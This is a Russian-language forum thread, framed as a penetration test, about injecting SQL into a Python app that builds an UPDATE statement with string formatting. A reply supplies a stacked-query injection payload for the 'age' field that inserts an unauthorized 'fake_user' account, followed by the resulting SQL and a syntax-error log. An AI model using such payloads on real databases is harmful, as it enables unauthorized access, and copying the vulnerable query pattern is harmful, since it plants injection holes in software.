Не могу составить SQL запрос для Penetration test / Microsoft SQL Server

ReSQL.ru

2.0.60

Полная версия Контакт Правила FAQ Помощь

Гость

Войти | Профиль | Очистить

Нов. | Гор. | Избр.

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Действия ...

Доб. в избранное
Игнор. тему
Прикреп. тему
Пометить прочит. / непрочит.
Фильтр:
Сообщения автора темы
Сообщение содержит вложения
Сообщение содержит картинки
Сообщение содержит видеоклипы
Сообщение содержит аудиоклипы
Сообщение содержит картинки или видео 18+

Форумы / Microsoft SQL Server [игнор отключен] [закрыт для гостей] / Не могу составить SQL запрос для Penetration test / 5 сообщений из 5, страница 1 из 1

25.04.2019, 21:48

#39806524

Sergunka

Участник

Откуда: Bay Area, CA
Сообщения: 2 050
Рейтинг: 0 / 0

Не могу составить SQL запрос для Penetration test

В общем есть приложение на питоне где исполняется простой SQL запрос

Код: python

database.execute("UPDATE users SET age={} WHERE username='{}';".format(age, username))

Есть огромное желание произвести вторжение через следующую комбинацию, если подставить через поле "age" следующее значение как это я (полный ламер в SQL) себе представляю

Код: sql

1.
2.
3.
4.

UPDATE users SET age=
( INSERT INTO users VALUES ("fake_user", "64762ccf8e701", "", 11); 
SELECT age from users WHERE username="terpila")
WHERE username="terpila"

В общем идея проста в поле SET попытаться протащить скрипт по созданию еще одно пользователя "fake_user".

Походу этого нельзя сделать, но всеж интересно было спросить... мало ли чего.

P.S. User "terpila"- уже есть в базе.
P.S.S. Disclaimer: Весь код и вторжения выдуманные и никак не связаны с реальными событиями.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.04.2019, 22:18

#39806530

alexeyvg

Участник

Откуда: Moscow
Сообщения: 26 926
Рейтинг: 0 / 0

Не могу составить SQL запрос для Penetration test

SergunkaВ общем идея проста в поле SET попытаться протащить скрипт по созданию еще одно пользователя "fake_user".

Походу этого нельзя сделать, но всеж интересно было спросить... мало ли чего.А что тут сложного???
Если, конечно, age и/или username могут быть произвольными строками.
Например, если age присвоить строку

Код: sql

'age WHERE username = null insert users values(''fake_user'', ''64762ccf8e701'', '''', 11) UPDATE users SET age=age '

то выполнится:

Код: sql

1.
2.
3.
4.
5.

UPDATE users 
SET age=age 
WHERE username = null 
insert users values('fake_user', '64762ccf8e701', '', 11) 
UPDATE users SET age=age WHERE username='terpila'

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.04.2019, 22:58

#39806536

Sergunka

Участник

Откуда: Bay Area, CA
Сообщения: 2 050
Рейтинг: 0 / 0

Не могу составить SQL запрос для Penetration test

alexeyvg,

Спасибо огромное. Идея хорошая... но пока дает ошибку.

Код: html

1.
2.

Executing query UPDATE users SET age=age WHERE username = null insert users values(''fakeuser'', ''64762ccf8e701cf9a687c4b9eb4fa88d590a202ff538dcd7d8e9391f53f2df3e'', '''', 11) UPDATE users SET age=age WHERE username='terpila';
SQL Error Occurred: near "insert": syntax error

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.04.2019, 23:03

#39806537

alexeyvg

Участник

Откуда: Moscow
Сообщения: 26 926
Рейтинг: 0 / 0

Не могу составить SQL запрос для Penetration test

SergunkaСпасибо огромное. Идея хорошая... но пока дает ошибку.Так нужно просто вывести полученную строку, и её отладить.
Тем более, если у вас не MSSQL :-)
Может, я ещё зря одинарные кавычки удваивал, у вас же строка не в сиквеле, а в клиенте.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.04.2019, 23:16

#39806539

Sergunka

Участник

Откуда: Bay Area, CA
Сообщения: 2 050
Рейтинг: 0 / 0

Не могу составить SQL запрос для Penetration test

alexeyvgSergunkaСпасибо огромное. Идея хорошая... но пока дает ошибку.Так нужно просто вывести полученную строку, и её отладить.
Тем более, если у вас не MSSQL :-)
Может, я ещё зря одинарные кавычки удваивал, у вас же строка не в сиквеле, а в клиенте.

Да, сейчас гляну какой синтаксис для Питоновской базы в памяти... спасибо за совет.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=46&tablet=1&tid=1687903]:	0ms
get settings:	6ms
get forum list:	11ms
check forum access:	2ms
check topic access:	2ms
track hit:	215ms
get topic data:	10ms
get forum data:	4ms
get page messages:	35ms
get tp. blocked users:	1ms
others:	248ms

total:	534ms